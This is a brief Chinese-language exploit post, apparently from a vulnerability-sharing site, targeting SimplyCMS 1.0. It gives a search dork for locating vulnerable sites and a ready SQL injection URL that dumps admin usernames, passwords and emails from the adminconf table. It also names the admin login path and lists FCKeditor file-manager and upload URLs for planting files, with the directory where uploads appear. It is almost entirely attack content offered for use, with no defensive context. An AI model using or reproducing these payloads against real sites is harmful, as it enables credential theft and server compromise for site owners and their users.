SimplyCMS 1.0 SQl注入和上传漏洞

  SimplyCMS 1.0  SQl注入和上传漏洞   批量:inurl:"index.php?subid=" "Powered by DST - SimplyCMS"   EXP: http://www.0day5.com/index.php?subid=7[sql]   http://www.0day5.com/index.php?subid=7'+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf-- -   后台登入: http://www.0day5.com/cms/index.php       上传漏洞   http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.0day5.com/FCKeditor/editor/filemanager/upload/test.html http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/frmupload.html   你的文件地址:   http://www.0day5.com/cms/myFiles/Image/

发表评论